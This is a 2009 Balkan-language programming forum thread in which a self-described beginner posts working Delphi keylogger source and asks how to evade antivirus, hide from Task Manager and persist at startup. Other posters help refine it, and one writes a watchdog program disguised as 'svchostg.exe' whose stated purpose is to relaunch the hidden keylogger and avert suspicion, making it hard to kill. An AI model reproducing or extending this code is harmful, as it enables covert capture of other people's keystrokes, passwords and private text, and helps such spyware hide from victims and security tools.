|
[ Senaid_backo @ 14.02.2009. 16:48 ] @
| Pozdrav,
Pošto sam početnik u delhi-ju i želim da što više naučim, odlučio sam da napravim jedan mali keylogger, koji ne želim da zloupotrebljavam već čisto da vidim kako to funkcioniše. Nakon višesatnog rada uspio sam i napraviti, međutim mi se ne sviđa kako radi. A evo postavit ću i source code, a zatim i pitanja:
Code:
unit Unit1;
interface
uses
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
Dialogs, ExtCtrls, StdCtrls;
type
TForm1 = class(TForm)
Memo1: TMemo;
Timer1: TTimer;
procedure Timer1Timer(Sender: TObject);
private
{ Private declarations }
public
{ Public declarations }
end;
var
Form1: TForm1;
implementation
{$R *.dfm}
function Write(txt: String): String;
begin
Form1.Memo1.Text := Form1.Memo1.Text + txt;
end;
procedure TForm1.Timer1Timer(Sender: TObject);
var
keyloop, KeyResult : Integer;
begin
keyloop := 0;
repeat
KeyResult := GetAsyncKeyState(keyloop);
if KeyResult = -32767 then
begin
case keyloop of
8: Write(' [BACKSPACE] ');
9: Write(' [TAB] ');
12: Write(' [ALT] ');
13: Write(' [ENTER] ');
16: Write(' [SHIFT] ');
17: Write(' [CONTROL] ');
18: Write(' [ALT] ');
20: Write(' [CAPS LOCK] ');
21: Write(' [PAGE UP] ');
27: Write(' [ESC] ');
33: Write(' [PAGE UP] ');
34: Write(' [PAGE DOWN] ');
35: Write(' [END] ');
36: Write(' [HOME] ');
37: Write ( '[LEFT ARROW]');
38: Write ( '[ARROW UP]');
39: Write ( '[RIGHT ARROW]');
40: Write ( '[ARROW BELOW]');
45: Write(' [INSERT] ');
46: Write(' [DEL] ');
91: Write ( '[WIN LEFT]');
92: Write ( '[WIN RIGHT]');
93: Write(' [MENU POP-UP] ');
96: Write('0');
97: Write('1');
98: Write('2');
99: Write('3');
100: Write('4');
101: Write('5');
102: Write('6');
103: Write('7');
104: Write('8');
105: Write('9');
106: Write(' [NUM *] ');
107: Write(' [NUM +] ');
109: Write(' [NUM -] ');
111: Write(' [NUM /] ');
112: Write(' [F1] ');
113: Write(' [F2] ');
114: Write(' [F3] ');
115: Write(' [F4] ');
116: Write(' [F5] ');
117: Write(' [F6] ');
118: Write(' [F7] ');
119: Write(' [F8] ');
120: Write(' [F9] ');
121: Write(' [F10] ');
122: Write(' [F11] ');
123: Write(' [F12] ');
144: Write(' [NUM LOCK] ');
187: Write('=');
188: Write(',');
189: Write('-');
190: Write('.');
191: Write(';');
193: Write('/');
220: Write(']');
221: Write('[');
222: Write('~');
226: Write('\');
else
if (KeyLoop >= 65) and (keyloop <= 90) then
Write(Chr(keyloop));
if (keyloop >= 32) and (keyloop <= 63) then
Write(Chr(keyloop));
if (keyloop >= 96) and (keyloop <= 110) then
Write(Chr(keyloop));
end;
end;
inc(keyloop);
until keyloop = 255;
end;
end.
A interesuje me sledeće:
1. Kako da napravim da mi u Memo komponenti ne piše npr. ENTER, BACKSPACE... već da to bude kako i radi u programima poput Word-a??
2. Kako da mi prije texta detektuje i napiše o kojem se processu radi??
3. Da li bi to nekako moglo da se napravi da ga ne detektuje antivirus ( ako neko ima code, ne da mi piše )??
Unaprijed zahvalan!
|
[ Sky Walker @ 14.02.2009. 17:33 ] @
ma skini s interneta potpuno legalno, nemoj da se mucis ovako
[ Senaid_backo @ 14.02.2009. 17:43 ] @
Nije mi cilj da skinem nešto gotovo, već da naučim. Nego možeš li pomoći??
[ Sky Walker @ 14.02.2009. 17:56 ] @
Na ovom forumu imas vrlo pametnih ljudi, siguran sam da ces dobiti odgovor uskoro.
Ja ti ne mogu pomoci dalje :(
Cheers
[ Senaid_backo @ 14.02.2009. 17:59 ] @
Pa nisam džaba odabrao ovaj forum :P.
A nadam se da će biti uskoro.
Cheers
[ savkic @ 14.02.2009. 18:40 ] @
Interesantan pristup detektovanju pritiska na tastere, ako ti je potrebna veća preciznost i mogućnosti pogledaj prethodne diskusije (SetWindowsHookEx je ključna reč).
> 1. Kako da napravim da mi u Memo komponenti ne piše npr. ENTER, BACKSPACE... već da to bude kako i radi u programima poput Word-a??
Želiš li da se po detektovanju entera doda novi red u tvom memo boxu? Oznaka za novi red je CRLF tj. #13#10, dakle Write(#13#10).
2. Kako da mi prije texta detektuje i napiše o kojem se processu radi??
Gde je pritisnut taster? Sa ovim pristupom jedino da pogledaš koji prozor ima fokus (GetForegroundWindow) i da pozoveš GetWindowModuleFileName.
3. Da li bi to nekako moglo da se napravi da ga ne detektuje antivirus ( ako neko ima code, ne da mi piše )??
Sa ovim pristupom koji koristiš ni jedan antivirus se neće buniti (osim ako ne budeš radio neke druge sumnjive stvari). Inače, antivirusi ne bi ni imali smisla kada bi postojao način da sumnjivi programi spreče njihovu detekciju.
[ Senaid_backo @ 14.02.2009. 19:50 ] @
Citat: Želiš li da se po detektovanju entera doda novi red u tvom memo boxu? Oznaka za novi red je CRLF tj. #13#10, dakle Write(#13#10).
Znaš li možda i za BACKSPACE, samo mi je to dvoje i potrebno pa da taj keylogger liči na nešto??
Citat: Gde je pritisnut taster? Sa ovim pristupom jedino da pogledaš koji prozor ima fokus (GetForegroundWindow) i da pozoveš GetWindowModuleFileName.
Možeš li napisati code za to, jer sam gledao help i googlao, a ništa nisam uspio :S. PLS.
Citat: Sa ovim pristupom koji koristiš ni jedan antivirus se neće buniti (osim ako ne budeš radio neke druge sumnjive stvari). Inače, antivirusi ne bi ni imali smisla kada bi postojao način da sumnjivi programi spreče njihovu detekciju.
Ne znam za druge AV, ali kod mene je Kaspersky kada sam pokušao da kompajliram, odmah izbrisao delphi32.exe tako da sam ga morao postaviti na trusted, a isto tako kada sam kompajlirao i otišao u folder gdje se nalazi, pa probao pokrenuti odmah mi je izbrisao fajl. Zašto, ako već kažeš da nema ništa što bi uzrokovalo detekciju od strane AV-a??
[ savkic @ 15.02.2009. 08:33 ] @
> Znaš li možda i za BACKSPACE, samo mi je to dvoje i potrebno pa da taj keylogger liči na nešto??
BackSpace moraš emulirati tako što obrišeš jedan znak pre tekuće lokacije, ako se nalaziš na kraju onda otprilike ovako:
Code:
var
Temp: string;
begin
if Memo.Lines.Count > 0 then
begin
Temp := Memo.Lines[Memo.Lines.Count - 1];
SetLength(Temp, Length(Temp) - 1);
Memo.Lines[Memo.Lines.Count - 1] := Temp;
end;
end;
> Možeš li napisati code za to, jer sam gledao help i googlao, a ništa nisam uspio :S. PLS.
Ipak ne može sa tom funkcijom, ona radi samo ako window pripada tekućem procesu. To što ti treba možeš uraditi pomoću CreateToolhelp32Snapshot i još par funkcija, ima već gotovih wrappera pa je stoga najbolje da njih koristiš. Downloduj JEDI biblioteku i pogledaj JclSysInfo.GetProcessNameFromWnd.
> Ne znam za druge AV, ali kod mene je Kaspersky kada sam pokušao da kompajliram, odmah izbrisao delphi32.exe tako da sam ga morao
> postaviti na trusted, a isto tako kada sam kompajlirao i otišao u folder gdje se nalazi, pa probao pokrenuti odmah mi je izbrisao fajl.
> Zašto, ako već kažeš da nema ništa što bi uzrokovalo detekciju od strane AV-a??
Imaš zaraženu/oštećenu Delphi verziju, računar ti je zaražen, program radi još nešto osim ovoga što si poslao a što nije dozvoljeno ili KAV pravi probleme.
[ Senaid_backo @ 15.02.2009. 16:20 ] @
Uspio sam napraviti i BACKSPACE nakon male ispravke, a ona izgleda ovako:
Code:
var
Temp: string;
if KeyLoop = 8 then
begin
Temp := Memo1.Lines[Memo1.Lines.Count - 1];
SetLength(Temp, Length(Temp) - 1);
Memo1.Lines[Memo1.Lines.Count - 1] := Temp;
end;
Što se tiče detektovanja processa pokušavao sam i ništa nisam uspio, pa sam i ostavio da to uradim kada još naučim Delphi, jer to očito s ovim znanjem ne mogu. A izgleda da Kaspersky nešto pravi probleme, jer komp. sigurno nije zaražen.
Pitao bih te još nešto da mi odg. ako imaš vremena:
1. Kako bi, i da li bi se moglo napraviti da npr. mi se otvori ova sadašnja forma, ali da keylogger ne radi, već da kada neko klikne na dugme npr. start, on počne sa radom?? Uglavnom to sam viđao samo ne znam u kojem jeziku je rađeno, mada mislim da je c++.
2. Kako naštimati da u Memo komponenti ne budu sve velika slova, već onako kako je korisnik kucao??
3. Imaš li možda ideju kako uraditi i za SHIFT?? Probao sam napraviti na razne načine, ali bez uspjeha. Pa sam zato ostavio ne definisanu SHIFT tipku, jer su mi svejedno sva slova velika :S.
[Ovu poruku je menjao Senaid_backo dana 15.02.2009. u 17:59 GMT+1]
[ savkic @ 15.02.2009. 19:08 ] @
> 1. Kako bi, i da li bi se moglo napraviti da npr. mi se otvori ova sadašnja forma, ali da keylogger ne radi, već da kada neko klikne na
> dugme npr. start, on počne sa radom??
Podesi timer da ti je disejblovan (Enabled property) i kada želiš da počne sa radom enejbluj ga.
> 2. Kako naštimati da u Memo komponenti ne budu sve velika slova, već onako kako je korisnik kucao??
Moraš voditi računa da li je pritisnut CapsLock i Shift i zavisno od toga menjati casing slova.
> 3. Imaš li možda ideju kako uraditi i za SHIFT?? Probao sam napraviti na razne načine, ali bez uspjeha. Pa sam zato ostavio ne
Kako uraditi šta?
[ Senaid_backo @ 16.02.2009. 14:25 ] @
Napravio sam što sam htio, ali imam još dva pitanja, a to je:
1. Zašto mi sledeći kod ne radi, tj. ne mogu da sakrijem process u Task Manager-u?? Poruka koju mi javlja je:
Code: The procedure entry point RegisterServiceProcess could not be located in the dynamic link library KERNEL32.DLL.
A evo i koda koji sam koristio:
Code: var
function RegisterServiceProcess(dwProcessID, dwType: Integer): Integer; stdcall; external 'KERNEL32.DLL';
implementation
{$R *.DFM}
procedure TForm1.Button1Click(Sender: TObject);
begin
RegisterServiceProcess(GetCurrentProcessID, 1);
end;
2. Napravio sam 2 dugmeta tj. jedno dodaje u startup, a drugo briše. Sve sam pokušavao uraditi da bi dugme za brisanje radilo, ali nikako neće. A evo i koda sa kojim sam radio, koji na nekim drugim primjerima radi ali ovdje neće:
Code: procedure TForm1.Button5Click(Sender: TObject);
var
DelphiReg: TRegistry;
begin
DelphiReg := TRegistry.Create;
DelphiReg.RootKey := HKEY_LOCAL_MACHINE;
if DelphiReg.OpenKey('\Software\Microsoft\Windows\CurrentVersion', False) then
DelphiReg.DeleteValue('Keylogger');
end;
[Ovu poruku je menjao Senaid_backo dana 16.02.2009. u 16:37 GMT+1]
[Ovu poruku je menjao Senaid_backo dana 16.02.2009. u 18:52 GMT+1]
[ savkic @ 17.02.2009. 08:48 ] @
> Napravio sam što sam htio, ali imam još dva pitanja, a to je:
> 1. Zašto mi sledeći kod ne radi, tj. ne mogu da sakrijem process u Task Manager-u?? Poruka koju mi javlja je:
Kao što sama poruka kaže ta funkcija ne postoji. RegisterServiceProcess je korišćena na Win9x sistemima, više ne. Ne postoji regularan način da se proces izbriše iz TM.
> 2. Napravio sam 2 dugmeta tj. jedno dodaje u startup, a drugo briše. Sve sam pokušavao uraditi da bi dugme za brisanje radilo, ali nikako neće.
> A evo i koda sa kojim sam radio, koji na nekim drugim primjerima radi ali ovdje neće:
Pogledaj prethodne diskusije o ubacivanju programa u startup.
[ Peke @ 26.02.2009. 11:32 ] @
@Senaid_backo
1. Za koje Win verzije pokusavas da ga napravis?
2. Ako nemas nameru da ga zloupotrebis sta ce ti brisanje iz TM-a dovoljno je da ga stavis kao system service i da iskljucis [End Program] u TM-u (da li sa loop opcijom ili pak koristeci blokadu preko WriteProcessMemory)?
3. A koliko sam ja uspeo da razumem i pregledam source (ako je kompletan), tebe vise interesuje kako da se ukloni sa Task bar-a?
Ako sam u pravu tebi bi odgovaralo nesko kao ovo
[ Senaid_backo @ 26.02.2009. 14:04 ] @
Citat: 1. Za koje Win verzije pokusavas da ga napravis?
Za bilo koju verziju Xp-a.
Citat: 2. Ako nemas nameru da ga zloupotrebis sta ce ti brisanje iz TM-a dovoljno je da ga stavis kao system service i da iskljucis [End Program] u TM-u (da li sa loop opcijom ili pak koristeci blokadu preko WriteProcessMemory)?
Nemam namjeru da ga zloupotrijebim već čisto da skontam kako takvo ness uraditi, a evo ti pa vidi kako izgleda ta gotova verzija, a ako možeš napiši primjer kako da isključim End program jer sam ness pokušavao i googlao ali nisam uspio ( početnik :S ) i ne pokušavam da ga uklonim iz Task bar-a jer to znam.
I evo da kažem da sam uspio da napravim ono za startup, kod je i bio ispravan nego ness kod mene do računara bilo.
http://www.speedyshare.com/642175691.html
[ Peke @ 26.02.2009. 22:38 ] @
@Senaid_backo
[quote="Senaid_backo"]Nemam namjeru da ga zloupotrijebim već čisto da skontam kako takvo ness uraditi, a evo ti pa vidi kako izgleda ta gotova verzija[/quote]
Gotova verzija mi nista ne znaci Source bi mi znacio ako zelis da pomognem i vidim sta si uradio?
Inace AV mi ga prijavljuje da pokusava Keyboard Hook. Jesi probao moj primer?
[ Senaid_backo @ 27.02.2009. 13:03 ] @
Citat: Jesi probao moj primer?
Da probao sam i nisam shvatio šta si s njime htio da pokažeš, jer si naveo da si mislio da ja hoću da sakrijem iz Task bar-a, što nije slučaj, ali nebitno. A nisam mislio da mi ti uradiš u programu već da mi navedeš primjer kako staviti na disable end program u task mng. ali evo ti source ako će ti pomoć.
[ Peke @ 28.02.2009. 03:18 ] @
Moram prestati da odgovaram u 3 ujutru kada zavrsim sa poslom. Moj primer ti radi detaljniji KeyLog a i nije ogranicen na tastaturu vec i na HID uredjaje bez tajmera i nije vezan za Keyboard Language Settings (Language Bar) jer koristi http://msdn.microsoft.com/en-us/library/ms645600(VS.85).aspx kao Hook.
Pazi ni moj primer nije savrsen jer nije po http://support.microsoft.com/kb/65124 (Handling the Keyboard) jer vraca OEM umesto odgovarajuceg karaktera, e da mislim da tu isto imas opis kako da dobijes Naziv za Enter.
Za Task Manager cu pogledati kako da sto jednostavnije da resis, ali kada se naspavam.
BTW: Sto me ES neda Attachment?
EDIT: Pogledaj http://support.microsoft.com/kb/155075 sve se moze :)
[ Senaid_backo @ 28.02.2009. 08:18 ] @
Koliko vidim ti si meni dao linkove i savjete kako da uradim neki program ono baš pravo tj. kao profi programer, međutim još uvijek učim i nisam stigao do tog stadija gdje bih mogao tako ness uraditi, tako da sam zadovoljan i sa ovim do sada. A kada budeš imao vremena i volje probaj šta napisati za taj task mng.
[ Almedin @ 28.02.2009. 22:44 ] @
Evo jedan programcici koji se brise iz liste programa i onemogucava End Task. Nije savrsen ali pokazuje jedan od nacina kako da se uradi.
[ Senaid_backo @ 28.02.2009. 23:26 ] @
Citat: Almedin: Evo jedan programcici koji se brise iz liste programa i onemogucava End Task. Nije savrsen ali pokazuje jedan od nacina kako da se uradi.
Ja se trudim da ti ne dosađujem, a ono ti ovako odgovori :D. Nego ovaj tvoj program u attachmentu ne funkcioniše ( kod mene ). Kada stavim na disable ništa se ne dešava, a kada stavim na Automatic disable samo ga isključi iz Applications dok u processes stoji kako jeste :S.
[ Almedin @ 01.03.2009. 08:50 ] @
Disable interaktivno iskljucuje/ukljucuje dugme End Task (o njemu je bilo govora) a Automatic periodicno iskljucuje End Task i brise program sa liste programa a ne sa liste procesa.
[ Senaid_backo @ 01.03.2009. 11:23 ] @
Zaključio sam to i sam :), ali to nije ono na šta sam ja mislio, ali ok. Kad dođe vrijeme za to, onda ću i napraviti.
[ Almedin @ 01.03.2009. 19:25 ] @
Citat: Da probao sam i nisam shvatio šta si s njime htio da pokažeš, jer si naveo da si mislio da ja hoću da sakrijem iz Task bar-a, što nije slučaj, ali nebitno. A nisam mislio da mi ti uradiš u programu već da mi navedeš primjer kako staviti na disable end program u task mng. ali evo ti source ako će ti pomoć.
Šta je ovo "end program", End task ili End process?
Citat: Almedin: Disable interaktivno iskljucuje/ukljucuje dugme End Task (o njemu je bilo govora) a Automatic periodicno iskljucuje End Task i brise program sa liste programa a ne sa liste procesa.
Citat: Senaid_backo: Zaključio sam to i sam :), ali to nije ono na šta sam ja mislio, ali ok. Kad dođe vrijeme za to, onda ću i napraviti.
Sada reci sta si htio:)
[ Senaid_backo @ 01.03.2009. 19:42 ] @
Prvo sam htio da kada neko pritisne u programu dugme Hide ( forma se sakrije i vraćaš je sa Ctrl+Alt+F8, što sam i napravio ), eh kada se ovako sakrije da se sakrije i iz Applications i Processes u Task mng., međutim @Peke mi je rekao da bi to on riješio tako što bi samo stavio na disable End Program, pa i ja govorim tako :S. Nadam se da sada kontaš šta sam htio da uradim :D, i da radi se o End Task i End Process, a ne o End Program.
[Ovu poruku je menjao Senaid_backo dana 02.03.2009. u 00:58 GMT+1]
[ Peke @ 02.03.2009. 04:13 ] @
@Senaid_Backo
Almedin, je dobro razumeo ono sto sam ja mislio. Veoma interesantan primer.
Koji mi je dao jednu malu ideju za slican ali manje upadljivo resenje.
Eto napravis mali rezidentni programcic (svchostg.exe) koji ce pratiti keylogger.exe pa ko ga nema neka ga startuje:
Code: unit Unit1;
interface
uses
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
Dialogs, ShellAPI;
type
TForm1 = class(TForm)
procedure FormCreate(Sender: TObject);
private
// Ova procedura ce reagovati na system Timer.
procedure WmAppCommand(var MyMess: TMessage);message WM_TIMER;
{ Private declarations }
public
{ Public declarations }
end;
var
implementation
{$R *.dfm}
procedure TForm1.WmAppCommand(var MyMess: TMessage);
begin
If FindWindow('TForm1','Keylogger') > 0 then
Exit
else
begin
ShellExecute(0,'open', 'keylogger.exe','',PChar(ExtractFilePath(Application.ExeName)),SW_HIDE);
end;
end;
procedure TForm1.FormCreate(Sender: TObject);
begin
// Promenimo Caption od Aplikacije tako da bude prepoznatljiv
Form1.Caption := 'Guardian Started';
// Napravimo WinAPi timer
SetTimer(Self.Handle,1,1000,nil);
end;
end.
Isto to uradi i u KeyLogger-u tako da prati Guardian Code: If FindWindow('TForm1','Guardian Started') > 0 then
Pazi da kada normalno izlazis iz Keyloggera da posalje guardianu komandu da se zatvori jer bi u slucaju
Code: PostMessage(Findwindow('TForm1','Guardian Started'), WM_CLOSE, 0, 0);
Izvini sto te forsiram da koristis WinAPI ali tako ces biti manje sumljiv tj. Programi ce ti imati manji Footprint (CPU/MEM) a i WinAPI ce ti koristiti u svakom slucaju posto je skoro isti u svim jezicima. Ali pogledaj Help -> Windows SDK i potrazi funkcije koje sam koristio.
BTW Sto se tice profi linkova, to i nije istina samo sam ti dao malo štiva za ucenje tj. da vidis kako se to resava na drugi nacin iliti kako to windows izmedju sebe resava i kako ce verovatno u buducnosti resavati. I Vista i Win 7 nisu izuzeci cak stavise dodaju samo nove stvari na isti princip.
I Opet ja u 05:15 Odgovaram :(
[Ovu poruku je menjao Peke dana 02.03.2009. u 05:50 GMT+1]
[ Senaid_backo @ 02.03.2009. 08:16 ] @
To se zove potruditi se da pomogneš nekome i to u 5 sati, hvala ti ( kao i ostalima ). Samo što nisam baš skontao primjenu ovoga primjera, jer koliko vidim svchostg.exe i keylogger.exe se samo međusobno pokreću :S, a možda i nisam uradio ovo kako treba, pa ću evo napisati/kopirati kod koji sam ubacio u keylogger.exe.
Code:
uses
.......
type
.......
private
procedure WmAppCommand(var MyMess: TMessage);message WM_TIMER;
...............
procedure TForm1.WmAppCommand(var MyMess: TMessage);
begin
If FindWindow('TForm1','Guardian Started') > 0 then
Exit
else
begin
ShellExecute(0,'open', 'svchostg/svchostg.exe','',PChar(ExtractFilePath(Application.ExeName)),SW_HIDE);
end;
end;
procedure TForm1.FormCreate(Sender: TObject);
begin
// Napravimo WinAPi timer
SetTimer(Self.Handle,1,1000,nil);
end;
procedure TForm1.FormClose(Sender: TObject; var Action: TCloseAction);
begin
PostMessage(Findwindow('TForm1','Guardian Started'), WM_CLOSE, 0, 0);
end;
I molio bih pojašnjenje??
[ Peke @ 02.03.2009. 19:47 ] @
Odradio si kako treba i dobro si shvatio tj. oba EXE fajla prate jedan drugog da li su startovani ali preko WinAPI System Timera-a a da ne bi razmisljali o Timer-u i sklonili sumlju sa programa.
Nasao sam malu gresku kod sebe O:)
OnClose nam Fali KillTimer(Self.Handle,1)
Code: procedure TForm1.FormClose(Sender: TObject; var Action: TCloseAction);
begin
// Kill timer prvo da ne bi kojim slucajem ponovo startovao Guardian
KillTimer(Self.Handle,1);
// poslati close guardian-u
PostMessage(Findwindow('TForm1','Guardian Started'), WM_CLOSE, 0, 0);
end;
OK, Sta jos nije jasno? ;)
[ Almedin @ 02.03.2009. 22:01 ] @
Citat: Senaid_backo: To se zove potruditi se da pomogneš nekome i to u 5 sati, hvala ti ( kao i ostalima ). Samo što nisam baš skontao primjenu ovoga primjera, jer koliko vidim svchostg.exe i keylogger.exe se samo međusobno pokreću :S, a možda i nisam uradio ovo kako treba, pa ću evo napisati/kopirati kod koji sam ubacio u keylogger.exe.
I molio bih pojašnjenje??
Posto si trazio savjet o uklanjanju programa sa liste procesa, pretpostavka je da ti je cilj da se tvoj program ne moze ubiti sto se i postize ovi nacinom kako je rekao Peke. Program (jedan od ova dva) se moze ubiti ali ce ga drugi ponovno pokrenuti. Pretpostavljam da je tebi vjerovatno draze da se program nikako ne vidi :)
[ Senaid_backo @ 02.03.2009. 22:06 ] @
Evo @Almedin mi je objasnio tako da mi je sada sve jasno, i da, naravno da bi mi bilo draže da se nikako ne vidi ali i ovo je odlično. Hvala svima na pomoći.
[ Peke @ 03.03.2009. 20:15 ] @
Hvala, bilo mi je drago.
Copyright (C) 2001-2025 by www.elitesecurity.org. All rights reserved.
|